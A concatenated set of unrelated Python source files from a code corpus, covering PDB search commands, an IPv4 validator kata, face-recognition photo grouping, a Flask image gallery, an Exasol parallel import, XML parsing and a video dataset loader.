self.query = query
self.type_ = type_
def execute(self):
searcher = Searcher(self.url,
[TerminalQuery(
SeqmotifService(self.query, self.type_, "pdb_protein_sequence"), self.resp_type,
start=self.start, rows=self.rows, response_parser=self.parser)])
resp = searcher.perform_search()
return resp[0]
class SequenceSimilarityCommand(Command):
def __init__(self, sequence, evalue=1, identity=0.9, *args, **kwargs):
super().__init__(*args, **kwargs)
self.success = 1
self.sequence = sequence
self.evalue = evalue
self.identity = identity
def execute(self):
searcher = Searcher(self.url,
[TerminalQuery(
SequenceService(self.sequence, self.evalue, self.identity, "pdb_protein_sequence"),
self.resp_type, start=self.start, rows=self.rows, response_parser=self.parser)])
resp = searcher.perform_search()
return resp[0]
class StructureSimilarityCommand(Command):
def __init__(self, entry_id, assembly_id=1, operator="strict_shape_match", *args, **kwargs):
super().__init__(*args, **kwargs)
self.success = 1
self.entry_id = entry_id
self.assembly_id = assembly_id
self.operator = operator
def execute(self):
searcher = Searcher(self.url,
[TerminalQuery(
StructureService(self.entry_id, self.assembly_id, self.operator), self.resp_type,
start=self.start, rows=self.rows, response_parser=self.parser)])
resp = searcher.perform_search()
return resp[0]
class StructureMotifCommand(Command):
def __init__(self, entry_id, residue_ids, score_cutoff=0, exchanges=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.success = 1
self.entry_id = entry_id
self.residue_ids = residue_ids
self.score_cutoff = score_cutoff
self.exchanges = exchanges or {}
def execute(self):
searcher = Searcher(self.url,
[TerminalQuery(
StructMotifService(self.entry_id, self.residue_ids, self.score_cutoff, self.exchanges),
self.resp_type, start=self.start, rows=self.rows, response_parser=self.parser)])
resp = searcher.perform_search()
return resp[0]
class TextCommand(Command):
def __init__(self, attribute, operator, value, *args, **kwargs):
super().__init__(*args, **kwargs)
self.attribute = attribute
self.operator = operator
self.value = value
def execute(self):
searcher = Searcher(self.url,
[TerminalQuery(
TextService(self.attribute, self.operator, self.value),
self.resp_type, start=self.start, rows=self.rows, response_parser=self.parser)])
resp = searcher.perform_search()
return resp[0]
@staticmethod
def get_doc():
TextService.set_input_params()
return TextService.input_params
| StarcoderdataPython |
3220658 | # Write an algorithm that will identify valid IPv4 addresses in dot-decimal format. IPs should be considered valid if
# they consist of four octets, with values between 0..255 (included).
# Input to the function is guaranteed to be a single string.
# Examples
# // valid inputs:
# 1.2.3.4
# 172.16.17.32
# // invalid inputs:
# 1.2.3
# 1.2.3.4.5
# 123.456.78.90
# 123.045.067.089
# Note: leading zeros (e.g. 01.02.03.04) are considered not valid in this kata!
import string
def is_valid_IP(strng):
if strng == '':
return False
lista = strng.split(".")
if len(lista) != 4:
return False
for elemento in lista:
if elemento[0] in string.ascii_letters:
return False
elif ' ' in elemento:
return False
elif int(elemento) not in range(0, 256):
return False
elif int(elemento[0]) == 0 and len(elemento) > 1:
return False
return True
assert (is_valid_IP("192.168.127.12")) == True, "Es una IP correcta, devuelve True"
assert (is_valid_IP('')) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("abc.def.ghi.jkl")) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("123.456.789.0")) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("12.34.56")) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("12.34.56 .1")) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("12.34.56.-1")) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("123.045.067.089")) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("127.1.1.0")) == True, "Es una IP correcta, devuelve True"
assert (is_valid_IP("0.0.0.0")) == True, "Es una IP correcta, devuelve True"
assert (is_valid_IP("0.34.82.53")) == True, "Es una IP correcta, devuelve True"
assert (is_valid_IP("192.168.1.300")) == False, "Es una IP incorrecta, devuelve False" | StarcoderdataPython |
3333338 | """Utility functions for the kraken integration."""
from __future__ import annotations
from pykrakenapi.pykrakenapi import KrakenAPI
def get_tradable_asset_pairs(kraken_api: KrakenAPI) -> dict[str, str]:
"""Get a list of tradable asset pairs."""
tradable_asset_pairs = {}
asset_pairs_df = kraken_api.get_tradable_asset_pairs()
for pair in zip(asset_pairs_df.index.values, asset_pairs_df["wsname"]):
if not pair[0].endswith(
".d"
): # Remove darkpools https://support.kraken.com/hc/en-us/articles/360001391906-Introducing-the-Kraken-Dark-Pool
tradable_asset_pairs[pair[1]] = pair[0]
return tradable_asset_pairs
| StarcoderdataPython |
170230 | <reponame>lennodev/ai-face-recognition-photo-grouping
import os
import shutil
import numpy as np
import tensorflow as tf
from PIL import Image as pilImage
from model.ModelLoader import ModelLoader
from service.FaceExtractService import FaceExtractService
from sklearn.preprocessing import LabelEncoder, Normalizer
class DetectService:
def __init__(self, modelLoader, faceExtractService, logger, configLoader):
self.configLoader = configLoader
self.modelLoader = modelLoader
self.logger = logger
self.faceExtractService = faceExtractService
self.predictThreshold = 80
self.outputPath = self.configLoader.getConfig("path", "outputPath")
self.normalizer = Normalizer(norm='l2') # L2 = least squares
def run(self, path):
self.logger.logInfo(
f"Start grouping process now. Please wait.....")
self.logger.logDebug(f"<Read folder images>: {path}")
# clean up output folder
shutil.rmtree(self.outputPath, ignore_errors=True)
# read faces and names mappings
fileNameFaceMap = self.faceExtractService.getEmbedFileNameFaceMap(path)
self.logger.logDebug(
f">loaded fileNameFaceMap: {len(fileNameFaceMap)}")
# prepare model for prediction
self.modelLoader.fitFaceNetModelFromFile()
# predict face
# self.logger.logDebug(f">Check is match with file name")
# self.guessIsMatchWithFileName(fileNameFaceMap)
self.logger.logDebug(f">Guess who is in the picture")
self.guessWhoInFile(path, fileNameFaceMap)
self.logger.logDebug("----------End------------\n")
self.logger.logInfo(
f"Photo grouping completed. View photo in /output folder")
def guessIsMatchWithFileName(self, fileNameFaceMap):
labelEncoder = self.modelLoader.labelEncoder
correctCnt = 0
invalidCnt = 0
unknownCnt = 0
for key in fileNameFaceMap:
fileName = key
embedFaceList = fileNameFaceMap[key]
# each face in file
for embedFace in embedFaceList:
# prediction for the face
currEmbFace = np.expand_dims(embedFace, axis=0)
predictClassArr = self.modelLoader.faceNetModel.predict(
currEmbFace)
predictClassProbArr = self.modelLoader.faceNetModel.predict_proba(
currEmbFace
)
# prepare result for display
predictClassInt = predictClassArr[0]
predictClassProb = (
predictClassProbArr[0, predictClassInt] * 100
) # get probability of predict item
predictClassName = labelEncoder.inverse_transform(
predictClassArr)
if(predictClassProb < self.predictThreshold):
personName = "Accuracy < " + \
str(self.predictThreshold) + "%, classify as Unknown"
else:
personName = predictClassName[0]
if(fileName.find(personName) >= 0):
resultStr = "Correct!"
correctCnt = correctCnt+1
else:
if(personName.find(", classify as Unknown") >= 0):
resultStr = "Unkonwn!!!!!"
unknownCnt = unknownCnt+1
else:
resultStr = "WRONG!!!!!!!!"
invalidCnt = invalidCnt+1
self.logger.logDebug(
f"Result: {resultStr}, Actual Person: {fileName}, Predict Person: {personName}, Proba: {str('{0:.2f}'.format(predictClassProb)) }%")
self.logger.logDebug("predictClass: %s" % predictClassInt)
self.logger.logDebug("predictProb: %s" % predictClassProbArr)
self.logger.logDebug(
"predictProb[0, predictClassIdx]: %s" % predictClassProb)
self.logger.logDebug("predictClassName: %s" % predictClassName)
self.logger.logDebug(
f"correctCnt: {correctCnt}, invalidCnt: {invalidCnt}, unknownCnt:{unknownCnt}")
self.logger.logDebug("----------------------\n")
def guessWhoInFile(self, path, fileNameFaceMap):
# loop each file
for key in fileNameFaceMap:
fileName = key
self.logger.logDebug(
f"------------------- Processing file {fileName} -------------------")
embedFaceList = fileNameFaceMap[key]
self.logger.logDebug(
f'embedFaceList shape:{np.asarray(embedFaceList).shape}')
# normalize list
embedFaceList = self.normalizer.transform(embedFaceList)
# each face in file
folderList = list()
for embedFace in embedFaceList:
# prediction for the face
currFace = np.expand_dims(embedFace, axis=0)
predictClassArr = self.modelLoader.faceNetModel.predict(
currFace)
predictClassProbArr = self.modelLoader.faceNetModel.predict_proba(
currFace)
self.logger.logDebug(
f"Direct result: predictClassArr: {predictClassArr}, predictClassProbArr: {predictClassProbArr}")
# prepare result for display
predictClassInt = predictClassArr[0]
predictClassProb = (
predictClassProbArr[0, predictClassInt]*100
) # get probability of predict item
predictClassName = self.modelLoader.labelEncoder.inverse_transform(
predictClassArr)
self.logger.logDebug(
f"predictClassInt: {predictClassInt}, predictClassName: {predictClassName}, predictClassProb: {predictClassProb}")
if(predictClassProb < self.predictThreshold):
personName = "classify as Unknown - " + \
str(predictClassProbArr) + ", " + predictClassName[0]
targetFolder = "Unknown"
else:
personName = predictClassName[0]
targetFolder = personName
self.logger.logDebug(
f"Guess: {personName} @ {str('{0:.2f}'.format(predictClassProb))}")
# prepare for copy to target folder
if(not targetFolder in folderList):
folderList.append(targetFolder)
# copy image to output folder
for folder in folderList:
srcPath = path+"/"+fileName
targetPath = self.outputPath+"/"+folder
os.makedirs(targetPath, exist_ok=True)
shutil.copy(srcPath, targetPath)
self.logger.logDebug(
f"File {fileName} copied to {len(folderList)} folder: {' | '.join(map(str, folderList))}\n")
| StarcoderdataPython |
3210808 | """
Parallel HTTP transport
IMPORT from multiple independent processes running in parallel
"""
import pyexasol
import _config as config
import multiprocessing
import pyexasol.callback as cb
import pandas
import pprint
printer = pprint.PrettyPrinter(indent=4, width=140)
class ImportProc(multiprocessing.Process):
def __init__(self, node):
self.node = node
self.read_pipe, self.write_pipe = multiprocessing.Pipe(False)
super().__init__()
def start(self):
super().start()
self.write_pipe.close()
@property
def exa_address(self):
return self.read_pipe.recv()
def run(self):
self.read_pipe.close()
# Init HTTP transport connection
http = pyexasol.http_transport(self.node['ipaddr'], self.node['port'])
# Send internal Exasol address to parent process
self.write_pipe.send(http.exa_address)
self.write_pipe.close()
data = [
{'user_id': 1, 'user_name': 'John', 'shard_id': self.node['idx']},
{'user_id': 2, 'user_name': 'Foo', 'shard_id': self.node['idx']},
{'user_id': 3, 'user_name': 'Bar', 'shard_id': self.node['idx']},
]
pd = pandas.DataFrame(data, columns=['user_id', 'user_name', 'shard_id'])
# Send data from DataFrame to HTTP transport
http.import_from_callback(cb.import_from_pandas, pd)
print(f"Child process {self.node['idx']} finished, imported rows: {len(pd)}")
if __name__ == '__main__':
pool_size = 5
pool = []
exa_address_list = []
C = pyexasol.connect(dsn=config.dsn, user=config.user, password=config.password, schema=config.schema)
C.execute('TRUNCATE TABLE parallel_import')
for n in C.get_nodes(pool_size):
proc = ImportProc(n)
proc.start()
pool.append(proc)
exa_address_list.append(proc.exa_address)
printer.pprint(pool)
printer.pprint(exa_address_list)
try:
C.import_parallel(exa_address_list, 'parallel_import')
except (Exception, KeyboardInterrupt):
for p in pool:
p.terminate()
else:
stmt = C.last_statement()
print(f'IMPORTED {stmt.rowcount()} rows in {stmt.execution_time}s')
finally:
for p in pool:
p.join()
| StarcoderdataPython |
170692 | <reponame>python-demo-codes/basics
# HEAD
# Augmented Assignment Operators
# DESCRIPTION
# Describes basic usage of all the augmented operators available
# RESOURCES
#
foo = 40
# Addition augmented operator
foo += 1
print(foo)
# Subtraction augmented operator
foo -= 1
print(foo)
# Multiplication augmented operator
foo *= 1
print(foo)
# Division augmented operator
foo /= 2
print(foo)
# Modulus augmented operator
foo %= 3
print(foo)
# Modulus augmented operator
foo //= 3
print(foo)
# Example Usage
strOne = 'Testing'
listOne = [1, 2]
strOne += ' String' # concat for strings and lists
print(strOne)
listOne *= 2 # replication for strings and lists
print(listOne)
| StarcoderdataPython |
143151 | # Add parent folder to path
import sys, os
sys.path.insert(1, os.path.join(sys.path[0], '..'))
import unittest
import numpy as np
from src.Equations.KineticEnergy import KineticEnergy
from src.Common import particle_dtype
class test_kinetic_energy(unittest.TestCase):
def test(self):
num = 100
pA = np.zeros(num, dtype=particle_dtype)
kE = KineticEnergy(len(pA), pA)
self.assertEqual(kE, 0)
# Add some props
pA['m'] = 1
pA['vx'] = 1
kE = KineticEnergy(len(pA), pA)
self.assertEqual(kE, num * 0.5 * 1 * 1)
if __name__ == "__main__":
test_kinetic_energy().test() | StarcoderdataPython |
152103 | <gh_stars>0
#!/usr/bin/env python
# Egami: a very simple image gallery built using Flask, which
# serves image files found in the directory where it is executed.
# Copyright (C) 2011-2015 <NAME> <<EMAIL>>
# http://github.com/flebel/egami
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import argparse
import glob
import itertools
import json
import os
from collections import OrderedDict, defaultdict
from flask import Flask, send_from_directory
from flask.ext.cache import Cache
from jinja2 import Template
# Look for files with an image extension (case insensitive.)
# Note that glob does not support regular expressions, hence the duplications.
IMAGE_EXTENSIONS = ('[gG][iI][fF]', '[jJ][pP][gG]', '[jJ][pP][eE][gG]', '[pP][nN][gG]')
# Path from where images are served. Must end with a forward slash.
IMAGES_URL = '/images/'
HTML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>{{cwd}}</title>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script type="text/javascript" charset="utf-8">
google.load("jquery", "1.7.0");
</script>
<script type="text/javascript">
//<![CDATA[
$(document).ready(function() {
var groups = {{images}};
var groups_keys = Object.keys(groups);
var images = groups[groups_keys[0]];
var number_images = images.length;
var currentIndex = number_images - 1;
function changeImage(index) {
var validIndex = getValidIndex(index);
$('img.current').attr('alt', images[validIndex]);
$('img.current').attr('src', '{{images_url}}' + images[validIndex]);
$('span.status').text("Now serving image " + (validIndex + 1) + " of " + number_images + " image(s) from '{{cwd}}':");
$('span.filename').text(images[validIndex]);
currentIndex = validIndex;
}
function getValidIndex(index) {
if (index < 0) {
index = 0;
}
if (index > images.length - 1) {
index = images.length - 1;
}
return index;
}
function preloadImage(index) {
var validIndex = getValidIndex(index);
$('<img />').attr('src', '{{images_url}}' + images[validIndex]).appendTo('body').hide();
}
function showPrevious() {
var offset = parseInt($('#offset').val());
changeImage(currentIndex - offset);
// Preload the previous image according to the (new) current position
preloadImage(currentIndex - offset);
}
function showNext() {
var offset = parseInt($('#offset').val());
changeImage(currentIndex + offset);
// Preload the next image according to the (new) current position
preloadImage(currentIndex + offset);
}
$('select#group').change(function (e) {
var group_name = $('#group').val();
images = groups[group_name];
number_images = images.length;
changeImage(number_images - 1);
});
$('button#first').click(function (e) {
e.preventDefault();
changeImage(0);
});
$('button#previous').click(function (e) {
e.preventDefault();
showPrevious();
});
$('button#next').click(function (e) {
e.preventDefault();
showNext();
});
$('button#last').click(function (e) {
e.preventDefault();
changeImage(images.length - 1);
});
$('button#preload').click(function (e) {
e.preventDefault();
var offset = parseInt($('#offset').val());
for (var i = currentIndex, n = images.length; i < n; i += offset) {
preloadImage(i);
}
});
$('a.current').click(function (e) {
e.preventDefault();
var action = $('#action').val();
switch (action) {
case 'previous':
showPrevious();
break;
case 'next':
showNext();
break;
case 'open':
window.location = '{{images_url}}' + images[validIndex];
break;
}
});
if (groups_keys.length <= 1) {
$('select#group').remove();
} else {
for (var i = 0; i < groups_keys.length; i++) {
$('<option/>').val(groups_keys[i]).html(groups_keys[i]).appendTo('select#group');
}
}
// Initially set the current image to the last one
if (images.length > 0) {
changeImage(currentIndex);
} else {
$('img.current').hide();
}
});
//]]>
</script>
<style type="text/css">
button, select {
height: 50px;
margin-right: 20px;
}
select#offset {
width: 50px;
}
img.current {
max-height: 640px;
max-width: 640px;
}
img.thumb {
max-height: 150px;
max-width: 150px;
}
</style>
</head>
<body>
<div id="nav">
<button id="first">First</button>
<button id="previous">Previous</button>
<select id="group">
</select>
<select id="offset">
<option value="1">1</option>
<option value="2">2</option>
<option value="5">5</option>
<option value="10">10</option>
<option value="25">25</option>
<option value="50">50</option>
<option value="100">100</option>
</select>
<button id="next">Next</button>
<button id="last">Last</button>
<hr/>
</div>
<div id="content">
<p><span class="status"></span> <span class="filename"></span></p>
<a class="current" href=""><img alt="" class="current" src=""/></a>
</div>
<div id="footer">
<hr/>
<button id="preload">Preload next images</button>
<select id="action">
<option value="previous" disabled selected>Action on click</option>
<option value="previous">Previous image</option>
<option value="next">Next image</option>
<option value="open">Open image</option>
</select>
</div>
</body>
</html>"""
app = Flask(__name__)
cache = Cache(app, config={'CACHE_TYPE': 'simple'})
cache_timeout = 15 # 15 seconds
parser = argparse.ArgumentParser(description='Exposes on the web the images found in current directory.')
parser.add_argument('port', metavar='port', default=1235, type=int, help='port on which to expose the web server.')
parser.add_argument('prefixes', metavar='prefix', type=str, nargs='*', help='list of file prefixes to be used to group images together.')
def _find_common_prefix(strings):
"""Given a list of `strings`, returns the longest common leading component.
http://stackoverflow.com/a/6718435
"""
if not strings:
return ''
s1 = min(strings)
s2 = max(strings)
for i, c in enumerate(s1):
if c != s2[i]:
return s1[:i]
return s1
def get_images():
files = []
for extension in IMAGE_EXTENSIONS:
files.extend(glob.glob('*.%s' % extension))
files.sort()
if not PREFIXES:
prefix = _find_common_prefix(files)
return {prefix: files}
groups = defaultdict(list)
for f, p in itertools.product(files, PREFIXES):
if f.startswith(p):
groups[p].append(f)
return groups
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')
response.headers.add('Access-Control-Allow-Methods', 'GET')
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/')
@cache.cached(timeout=cache_timeout)
def album():
images = get_images()
template = Template(HTML)
return template.render(cwd=os.getcwdu(),
images=json.dumps(images),
images_url=IMAGES_URL)
@app.route('/latest')
def latest():
latest_images = reversed(sorted(glob.glob('*.*'), key=os.path.getctime))
humanized_extensions = [''.join(OrderedDict.fromkeys(ext.translate(None, '[]').lower())) for ext in IMAGE_EXTENSIONS]
for image, extension in itertools.product(latest_images, humanized_extensions):
if image.lower().endswith(extension):
break
return send_from_directory(os.getcwdu(), image)
@app.route(IMAGES_URL + '<filename>')
def images(filename):
return send_from_directory(os.getcwdu(), filename)
if __name__ == '__main__':
#app.debug = True
args = parser.parse_args()
PREFIXES = sorted(args.prefixes)
app.run(port=args.port)
| StarcoderdataPython |
150414 | <reponame>kjahan/evaluation
import os
from datetime import datetime
import pandas as pd
import tqdm
def load(filename, path, delim='\t'):
filename = os.path.join(path, filename)
dataframe = pd.read_csv(filename, sep=delim)
return dataframe
def parse_time(df):
date_parse = lambda x: pd.datetime.strptime(x, '%Y-%m-%d %H:%M:%S.%f')
df['datetime'] = df['datetime'].apply(date_parse)
return df
def parse_timestamp(df):
ts_parse = lambda x: datetime.utcfromtimestamp(int(x))
df['datetime'] = df['timestamp'].apply(ts_parse)
df = df.drop('timestamp', 1)
return df
def split(dataframe, split_time):
"""
dataframe: pandas dataframe with
"""
train_df = dataframe.loc[dataframe['datetime'] <= split_time]
test_df = dataframe.loc[dataframe['datetime'] > split_time]
return train_df, test_df
def generate_true_labels(test_df):
"""
test_df: a Pandas dataframe with two columns user_id and item_id
return: a dictionary from user_id to items that they have seen
"""
user_labels = {}
with tqdm.tqdm(total=test_df.shape[0]) as progress:
for index, row in test_df.iterrows():
user_id, item_id = row['user_id'], row['item_id']
try:
item_id = int(item_id)
user_labels[user_id].append(item_id)
except KeyError:
user_labels[user_id] = [item_id]
progress.update(1)
print("No of users in test fold: {}".format(len(user_labels.keys())))
return user_labels
| StarcoderdataPython |
142194 | <filename>python/xml_count_attrib.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 12 15:26:30 2019
@author: Ham
HackerRanch Challenge: XML 1 - Find the Score
You are given a valid XML document, and you have to print its score.
The score is calculated by the sum of the score of each element.
For any element, the score is equal to the number of attributes it has.
Input Format
The first line contains N, the number of lines in the XML document.
The next N lines follow containing the XML document.
Output Format
Output a single line, the integer score of the given XML document.
Sample Input (also see STDIN_SIO below)
6
<feed xml:lang='en'>
<title>HackerRank</title>
<subtitle lang='en'>Programming challenges</subtitle>
<link rel='alternate' type='text/html' href='http://hackerrank.com/'/>
<updated>2013-12-25T12:00:00</updated>
</feed>
Sample Output
5
Explanation
The feed and subtitle tag have one attribute each - lang.
The title and updated tags have no attributes.
The link tag has three attributes - rel, type and href.
So, the total score is 1 + 0 + 1 + 3 + 0 == 5.
There may be any level of nesting in the XML document. To learn about XML parsing, refer here.
NOTE: In order to parse and generate an XML element tree, use the following code:
>> import xml.etree.ElementTree as etree
>> tree = etree.ElementTree(etree.fromstring(xml))
Here, XML is the variable containing the string.
Also, to find the number of keys in a dictionary, use the len function:
>> dicti = {'0': 'This is zero', '1': 'This is one'}
>> print (len(dicti))
2
"""
#import io
import xml.etree.ElementTree as etree
STDIN_SIO = """
15
<feed xml:lang='en'>
<entry>
<author gender='male'>Harsh</author>
<question type='medium' language='python'>XML 2</question>
<description type='text'>This is related to XML parsing</description>
</entry><entry>
<author gender='male'>Harsh</author>
<question type='medium'>XML 2</question>
<description type='text'>This is related to XML parsing</description>
</entry><entry>
<author gender='male'>Harsh</author>
<question type='medium'>XML 2</question>
<description type='text'>This is related to XML parsing</description>
</entry>
</feed>
""".strip()
def get_attr_number(node):
"doc"
return len(node.attrib) + sum(get_attr_number(child) for child in node)
if __name__ == '__main__':
STDIN_SIO = STDIN_SIO.split("\n", 1)[1:] # discard 1st line
#print(len(STDIN_SIO), "<" + STDIN_SIO[0] + ">")
tree = etree.ElementTree(etree.fromstring(STDIN_SIO[0]))
print(get_attr_number(tree.getroot()))
| StarcoderdataPython |
3200721 | from httpx import get,post
<KEY>CDFk=print
<KEY>DF='dunossauro'
KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkDo='meu_segrdo_123'
class KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCDko:
def __init__(<KEY>):
KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkFD.atributo=7
def <KEY>D(<KEY>):
return KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkFD.atributo
def KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkoF():
KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkFo=get('http://google.com')
return KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkFo
def <KEY>kF(user,passw):
KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkFo=post('http://meusite.com',json={'password':<PASSWORD>,'username':user})
return KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkFo
KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCDFk(KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkoF())
KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCDFk(KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCDkF(KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkDF,KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkDo))
# Created by pyminifier (https://github.com/liftoff/pyminifier)
| StarcoderdataPython |
82870 | import json
import os
import os.path
import cv2
import numpy as np
import torch
import torch.utils.data as data_utl
from tqdm import tqdm
from dataset.vidor import VidOR
from frames import extract_all_frames
def video_to_tensor(pic):
"""Convert a ``numpy.ndarray`` to tensor.
Converts a numpy.ndarray (T x H x W x C)
to a torch.FloatTensor of shape (C x T x H x W)
Args:
pic (numpy.ndarray): Video to be converted to tensor.
Returns:
Tensor: Converted video.
"""
return torch.from_numpy(pic.transpose([3, 0, 1, 2]))
def load_rgb_frames(video_path, image_dir, begin, end, extract_frames=False):
"""
:param video_path: if u need 2 extract frames, but b careful, this setting needs a long time!
:param image_dir: This is image dir, but not same with extract frames func
:param begin:
:param end:
:param extract_frames:
:return:
"""
frames = []
video_path_splits = video_path.split('/')
image_dir_path = os.path.join(image_dir, video_path_splits[-2], video_path_splits[-1][:-4])
if extract_frames:
# Be careful! This step will take a long time!
extract_all_frames(video_path, image_dir_path)
for i in range(begin, end):
img_path = os.path.join(image_dir_path, str(i).zfill(6) + '.jpg')
if os.path.exists(img_path):
img = cv2.imread(img_path)[:, :, [2, 1, 0]]
w, h, c = img.shape
if w < 226 or h < 226:
d = 226. - min(w, h)
sc = 1 + d / min(w, h)
img = cv2.resize(img, dsize=(0, 0), fx=sc, fy=sc)
img = (img / 255.) * 2 - 1
frames.append(img)
else:
if len(frames) >= 1:
frames.append(frames[-1])
# final relength the frames list
for miss_frame in range(end - begin - len(frames)):
frames.insert(0, frames[0])
return np.asarray(frames, dtype=np.float32)
def load_flow_frames(image_dir, vid, start, num):
frames = []
for i in range(start, start + num):
imgx = cv2.imread(os.path.join(image_dir, vid, vid + '-' + str(i).zfill(6) + 'x.jpg'), cv2.IMREAD_GRAYSCALE)
imgy = cv2.imread(os.path.join(image_dir, vid, vid + '-' + str(i).zfill(6) + 'y.jpg'), cv2.IMREAD_GRAYSCALE)
w, h = imgx.shape
if w < 224 or h < 224:
d = 224. - min(w, h)
sc = 1 + d / min(w, h)
imgx = cv2.resize(imgx, dsize=(0, 0), fx=sc, fy=sc)
imgy = cv2.resize(imgy, dsize=(0, 0), fx=sc, fy=sc)
imgx = (imgx / 255.) * 2 - 1
imgy = (imgy / 255.) * 2 - 1
img = np.asarray([imgx, imgy]).transpose([1, 2, 0])
frames.append(img)
return np.asarray(frames, dtype=np.float32)
def make_vidor_dataset(anno_rpath, splits, video_rpath, task, low_memory=True):
vidor_dataset = VidOR(anno_rpath, video_rpath, splits, low_memory)
if task not in ['object', 'action', 'relation']:
print(task, "is not supported! ")
exit()
vidor_dataset_list = []
if task == 'action':
with open('actions.json', 'r') as action_f:
actions = json.load(action_f)['actions']
for each_split in splits:
print('Preparing: ', each_split)
get_index_list = vidor_dataset.get_index(each_split)
pbar = tqdm(total=len(get_index_list))
for ind in get_index_list:
for each_ins in vidor_dataset.get_action_insts(ind):
video_path = vidor_dataset.get_video_path(ind)
start_f, end_f = each_ins['duration']
label = np.full((1, end_f - start_f), actions.index(each_ins['category']))
vidor_dataset_list.append((video_path, label, start_f, end_f))
pbar.update(1)
pbar.close()
return vidor_dataset_list
class VidorPytorchTrain(data_utl.Dataset):
def __init__(self, anno_rpath, splits, video_rpath,
frames_rpath, mode, save_dir, task='action',
transforms=None, low_memory=True):
self.data = make_vidor_dataset(
anno_rpath=anno_rpath,
splits=splits,
video_rpath=video_rpath,
task=task,
low_memory=low_memory)
self.frames_rpath = frames_rpath
self.transforms = transforms
self.mode = mode
self.task = task
self.save_dir = save_dir
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
video_path, label, start_f, end_f = self.data[index]
vid_paths = video_path.split('/')
img_dir_path = os.path.join(self.frames_rpath, vid_paths[-2], vid_paths[-1][:-4])
if os.path.exists(img_dir_path):
if self.mode == 'rgb':
imgs = load_rgb_frames(video_path=video_path,
image_dir=self.frames_rpath,
begin=start_f,
end=end_f)
else:
# imgs = load_flow_frames(self.root, vid, start_f, 64)
print('not supported')
# label = label[:, start_f: end_f]
imgs = self.transforms(imgs)
# return video_to_tensor(imgs), 0 # correct
# return 0, torch.from_numpy(label) # runtimeError sizes must be non-negative
return video_to_tensor(imgs), torch.from_numpy(label)
return 0, 0
def __len__(self):
return len(self.data)
class VidorPytorchExtract(data_utl.Dataset):
def __init__(self, anno_rpath, save_dir, splits,
video_rpath, frames_rpath, mode, task='action',
transforms=None, low_memory=True):
self.data = make_vidor_dataset(
anno_rpath=anno_rpath,
splits=splits,
video_rpath=video_rpath,
task=task,
low_memory=low_memory)
self.frames_rpath = frames_rpath
self.splits = splits
self.transforms = transforms
self.mode = mode
self.save_dir = save_dir
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
video_path, label, start_f, end_f = self.data[index]
vid_paths = video_path.split('/')
img_dir_path = os.path.join(self.frames_rpath, vid_paths[-2], vid_paths[-1][:-4])
if os.path.exists(img_dir_path + '.npy'):
return 0, 0, vid_paths[-2], vid_paths[-1][:-4]
if os.path.exists(img_dir_path):
if self.mode == 'rgb':
imgs = load_rgb_frames(video_path=video_path,
image_dir=self.frames_rpath,
begin=start_f,
end=end_f)
else:
# imgs = load_flow_frames(self.root, vid, start_f, 64)
print('not supported')
imgs = self.transforms(imgs)
return video_to_tensor(imgs), torch.from_numpy(label), vid_paths[-2], vid_paths[-1][:-4]
return -1, -1, vid_paths[-2], vid_paths[-1][:-4]
def __len__(self):
return len(self.data)
if __name__ == '__main__':
import videotransforms
from torchvision import transforms
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-where', type=str, default="local")
parser.add_argument('-split', type=str, default="test")
parser.add_argument('-dataset', type=str, default='ext')
args = parser.parse_args()
local_anno_rpath = '/home/daivd/PycharmProjects/vidor/annotation'
local_video_rpath = '/home/daivd/PycharmProjects/vidor/test_vids'
gpu_anno_rpath = '/storage/dldi/PyProjects/vidor/annotation'
gpu_video_rpath = '/storage/dldi/PyProjects/vidor/train_vids'
mode = 'rgb'
save_dir = 'output/features/'
low_memory = True
batch_size = 1
